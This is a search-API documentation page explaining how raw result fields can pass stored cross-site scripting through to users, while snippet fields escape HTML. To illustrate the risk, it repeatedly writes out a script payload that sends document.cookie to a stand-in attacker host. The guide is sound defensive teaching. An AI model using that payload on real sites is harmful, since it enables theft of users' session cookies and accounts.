New

The executive guide to generative AI

Read more

Sanitization Guide

edit

Sanitization Guide

edit

A query against your Engine returns documents.

A document, in its tidiest form, looks like so:

{
  "nps_link": "https://www.nps.gov/romo/index.htm",
  "title": "Rocky Mountain",
  "date_established": "1915-01-26T06:00:00+00:00",
  "world_heritage_site": "false",
  "states": [ "Colorado" ],
  "description": "Bisected north to south by the Continental Divide, this portion of the Rockies has ecosystems varying from over 150 riparian lakes to montane and subalpine forests to treeless alpine tundra. Wildlife including mule deer, bighorn sheep, black bears, and cougars inhabit its igneous mountains and glacial valleys. Longs Peak, a classic Colorado fourteener, and the scenic Bear Lake are popular destinations, as well as the historic Trail Ridge Road, which reaches an elevation of more than 12,000 feet (3,700 m).",
  "visitors": 4517585,
  "id": "park_rocky-mountain",
  "location": "40.4,-105.58",
  "square_km": 1075.6,
  "acres": 265795.2
}

It is a classic JSON object with key/value pairs.

When a document is returned via search, the presentation of the values will change depending on how you have parameterized your query.

A very basic query, with no alteration, will return raw values:

{
    "nps_link": {
      "raw": "https://www.nps.gov/romo/index.htm"
    },
    "title": {
      "raw": "Rocky Mountain"
    },
    "date_established": {
      "raw": "1915-01-26T06:00:00+00:00"
    },
    "world_heritage_site": {
      "raw": "false"
    },
    "states": {
      "raw": [
        "Colorado"
      ]
    },
    "description": {
      "raw": "Bisected north to south by the Continental Divide, this portion of the Rockies has ecosystems varying from over 150 riparian lakes to montane and subalpine forests to treeless alpine tundra. Wildlife including mule deer, bighorn sheep, black bears, and cougars inhabit its igneous mountains and glacial valleys. Longs Peak, a classic Colorado fourteener, and the scenic Bear Lake are popular destinations, as well as the historic Trail Ridge Road, which reaches an elevation of more than 12,000 feet (3,700 m)."
    },
    "visitors": {
      "raw": 4517585
    },
    "id": {
      "raw": "park_rocky-mountain"
    },
    "location": {
      "raw": "40.4,-105.58"
    },
    "square_km": {
      "raw": 1075.6
    },
    "acres": {
      "raw": 265795.2
    },
    "_meta": {
      "score": 17.739115
    }
  }

A raw value is un-sanitized.

It is an exact representation of the value within a field. And it may be vulnerable to XSS risks!

An enhancement to the basic query is the result_fields parameter.

It allows one to specify how many characters to return and whether to return a raw or snippet value.

A snippet value can be between 20 and 1000 characters.

A raw value must be at least 20 characters. It does not have an upper bound, apart from the maximum document size.

For demonstration purposes, the following query...

curl -X GET '<ENTERPRISE_SEARCH_BASE_URL>/api/as/v1/engines/national-parks-demo/search' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer search-soaewu2ye6uc45dr8mcd54v8' \
-d '{
  "query": "rocky mountain national park",
  "result_fields": {
    "description": {
      "raw": {
        "size": 20
      }
    }
  }
}'
  1. will return only one field - description - in raw format, which has been chopped due to the "size": 20 parameter:
...
{
   "description": {
     "raw": "Bisected north to"
   },
   "id": {
     "raw": "park_rocky-mountain"
   },
   "_meta": {
     "score": 14.25167
   }
}
...

Instead of asking for a raw value, we can also request a snippet.

Snippets enhance the user experience by highlighting direct query matches within your results.

They work only on text fields.

And they also act as a sort of preventative measure against Cross-site Scripting (XSS) attacks.

Within your application, it might be the case where you allow users to comment on a product, write articles, or provide status updates.

Perhaps that looks something like this:

curl -X POST 'https://example.com/product/3/comment' \
-H 'Content-Type: application/json' \
-d '{
  "comment": "An amazing product!"
}'

If the input has not been sanitized, some shady character might take advantage.

They can inject malicious JavaScript alongside the comment...!

This fake script is designed to steal the cookies of a site goer, which the attacker could then use to steal a user’s login or personal information:

+<script>window.location='http://cookiestealer.jerk/?stolencookie='+document.cookie</script>+

curl -X POST 'https://example.com/product/3/comment' \
-H 'Content-Type: application/json' \
-d '{
  "comment": "An amazing <script>window.location='http://cookiestealer.jerk/?stolencookie='+document.cookie</script> product!"
}'

Now this comment might be sent both to your database and your Engine for searching.

Since you want your comments searchable, the full text value would be indexed — including the malicious JavaScript.

If we were returning raw values, we return the exact contents of the matching document field. And so this...

curl -X POST '<ENTERPRISE_SEARCH_BASE_URL>/api/as/v1/engines/xss-demo/search' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer search-7eud55t7ecdmqzcanjsc9cqu' \
-d '{
  "query": "amazing",
  "result_fields": {
    "comment": {
      "raw": {
        "size": 200
      }
    }
  }
}'

... would return this:

...
{
  ...
   "comment": {
     "raw": "An amazing <script>window.location='http://cookiestealer.jerk/?stolencookie='+document.cookie</script> product!"
   }
   ...
}
...

Depending on how you are displaying your search results, this could inject the malicious code into your searcher’s results.

This is dangerous!

A snippet does not have this risk...

curl -X POST '<ENTERPRISE_SEARCH_BASE_URL>/api/as/v1/engines/xss-demo/search' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer search-7eud55t7ecdmqzcanjsc9cqu' \
-d '{
  "query": "amazing",
  "result_fields": {
    "comment": {
      "snippet": {
        "size": 200
      }
    }
  }
}'

Which would return this:

{
  ...
    "comment": {
       "snippet": "An <em>amazing</em> &lt;script&gt;window.location=&#x27;http:&#x2F;&#x2F;cookiestealer.jerk&#x2F;?stolencookie=&#x27;+document.cookie&lt;&#x2F;script&gt; product!"
     }
  ...
}

Ah-ha! The malicious code has become gibberish. The only browser interpretable result values that snippets return are the <em></em> tags.

Your moderators can see very quickly that someone is up to no good and you can remove offending documents from your Engine.

While snippets provide some coverage for XSS intrusions, their key purpose is to improve the scan-ability of search results.

Highlighted query matches provide a better user experience. And raw responses are valuable, too.

They should be used, but with caution.

A common case might be injecting raw code into the DOM, returning something such as: href={result.url.raw} within your results.

We hope the potential risks of accepting un-sanitized raw values is now clear.

Be sure to implement your own mechanism of sanitization!

Equipped with this insight into sanitization, check out the Results Fields API Reference.

Was this helpful?
Feedback